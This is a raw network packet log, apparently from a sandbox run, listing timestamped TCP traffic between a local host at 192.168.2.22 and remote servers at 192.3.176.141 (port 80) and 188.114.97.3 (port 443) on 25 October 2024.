Oct 25, 2024 19:50:57.591590881 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.591680050 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.591756105 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.729268074 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.729391098 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.729420900 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.729454994 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.729489088 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.729485989 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.729486942 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.729523897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.729532003 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.729532003 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.729567051 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.730041027 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.730103016 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.730261087 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.730315924 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.797871113 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.797935009 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.797966003 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.797998905 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.798044920 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.798136950 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.798136950 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.798161030 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.798196077 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.798218966 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.798288107 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.867418051 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.867444038 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.867461920 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.867546082 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.867733002 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.867981911 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.868042946 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.938323021 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.938342094 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.938355923 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.938371897 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:57.938437939 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:57.938438892 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.006990910 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.007098913 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.007844925 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.007910013 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.389308929 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.389451981 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.389477015 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.389537096 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.723455906 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.723498106 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.723531961 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.723567009 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.723584890 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.723584890 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.723586082 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.723599911 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.723640919 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.723659992 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.727480888 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.727555037 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.732662916 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.732697964 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.732768059 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.732863903 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.981451035 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.981628895 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:58.981652975 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:58.981713057 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.124702930 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.124763966 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.124787092 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.124845982 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.124872923 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.124907017 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.124922991 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.124942064 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.124954939 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.124989986 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.125089884 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.125138044 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.195583105 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.195719004 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.195729971 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.195765018 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.195791006 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.195800066 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.195811987 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.195832968 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.195852041 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.195877075 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.265388966 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.265448093 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.265500069 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.265532970 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.265567064 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.265566111 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.265567064 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.265567064 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.265620947 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.265620947 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.334959984 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.335115910 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.335123062 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.335150003 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.335185051 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.335191965 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.335191965 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.335232019 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.335248947 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.335295916 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.621736050 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.621921062 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.622379065 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.622415066 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.622478962 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.622478962 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.625173092 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.625246048 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.779916048 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.779953957 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.779987097 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.780026913 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.919054985 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.919222116 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.919259071 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.919292927 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.919301033 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.919351101 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.919351101 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.919584990 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.919617891 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.919631004 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.919653893 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.991035938 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.991070986 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.991115093 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.991115093 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.991125107 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.991158962 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:50:59.991183996 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:50:59.991206884 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.372992039 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.373030901 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.373132944 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.373523951 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.443804979 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.443927050 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.443964958 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.443965912 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.444046021 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.444046021 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.444314003 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.444369078 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.826349020 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.826615095 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:00.898802042 CEST	80	49166	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:00.899012089 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:03.346322060 CEST	49166	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:04.511929035 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:04.511991978 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:04.512053013 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:04.512367964 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:04.512386084 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:05.137373924 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:05.137512922 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:05.139035940 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:05.139050961 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:05.146261930 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:05.146291971 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:05.566597939 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:05.566740036 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:05.566755056 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:05.566804886 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:05.567256927 CEST	49167	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:05.567276001 CEST	443	49167	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:07.053755045 CEST	49168	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:07.128829956 CEST	80	49168	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:07.128892899 CEST	49168	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:07.133232117 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.133271933 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:07.133317947 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.151923895 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.151938915 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:07.799700022 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:07.799766064 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.808407068 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.808430910 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:07.808712959 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:07.808756113 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.907346010 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:07.955327988 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:08.090832949 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.096541882 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:08.096602917 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.097014904 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.102461100 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:08.321577072 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:08.321626902 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:08.321650028 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:08.321712017 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:08.321744919 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:08.321744919 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:08.324143887 CEST	49169	443	192.168.2.22	188.114.97.3
Oct 25, 2024 19:51:08.324155092 CEST	443	49169	188.114.97.3	192.168.2.22
Oct 25, 2024 19:51:08.325541973 CEST	49168	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.326188087 CEST	49171	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.331341982 CEST	80	49168	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:08.331398964 CEST	49168	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.331598043 CEST	80	49171	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:08.331671953 CEST	49171	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.332019091 CEST	49171	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:08.337312937 CEST	80	49171	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:08.991213083 CEST	80	49171	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:08.991348982 CEST	49171	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:09.880809069 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:09.880866051 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:09.881577969 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:09.881623983 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.252120018 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.252147913 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.252159119 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.252171040 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.252207041 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.252207041 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.388633966 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.388712883 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.388756990 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.388770103 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.388782024 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.388792992 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.388797045 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.388807058 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.388818979 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.388840914 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.461273909 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.461291075 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.461327076 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.461355925 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.843496084 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.843511105 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.843545914 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.843570948 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.843611956 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.843626022 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.843637943 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.843648911 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.843672037 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.843763113 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.843802929 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.844526052 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.844564915 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:10.915395975 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.915414095 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:10.915497065 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.318669081 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.318696976 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.318880081 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.443262100 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.443290949 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.443303108 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.443324089 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.443402052 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.443438053 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.443996906 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.444010973 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.444041967 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.444058895 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.513248920 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.513267994 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:11.513329983 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:11.513366938 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.497559071 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.497596025 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.497607946 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.497637987 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.497661114 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.497729063 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.497760057 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.497911930 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.497941017 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.567667961 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.567698002 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.567708969 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.567720890 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.567730904 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.567754030 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.567754030 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.638220072 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.638279915 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.638292074 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.638303041 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:12.638329983 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.638358116 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:12.638358116 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.026601076 CEST	80	49171	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.026789904 CEST	49171	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.146511078 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.151909113 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.151968956 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.152308941 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.158200026 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806427002 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806452990 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806493044 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806500912 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806514978 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806529045 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806538105 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806539059 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806560040 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806608915 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806612015 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806629896 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806655884 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806655884 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806677103 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806679964 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806698084 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806703091 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.806716919 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.806740046 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.808614969 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.809362888 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.812040091 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.812062025 CEST	80	49172	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.812110901 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.812140942 CEST	49172	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.830471992 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.830486059 CEST	80	49170	192.3.176.141	192.168.2.22
Oct 25, 2024 19:51:14.830522060 CEST	49170	80	192.168.2.22	192.3.176.141
Oct 25, 2024 19:51:14.830550909 CEST	49170	80	192.168.2.22	192.3.176.141
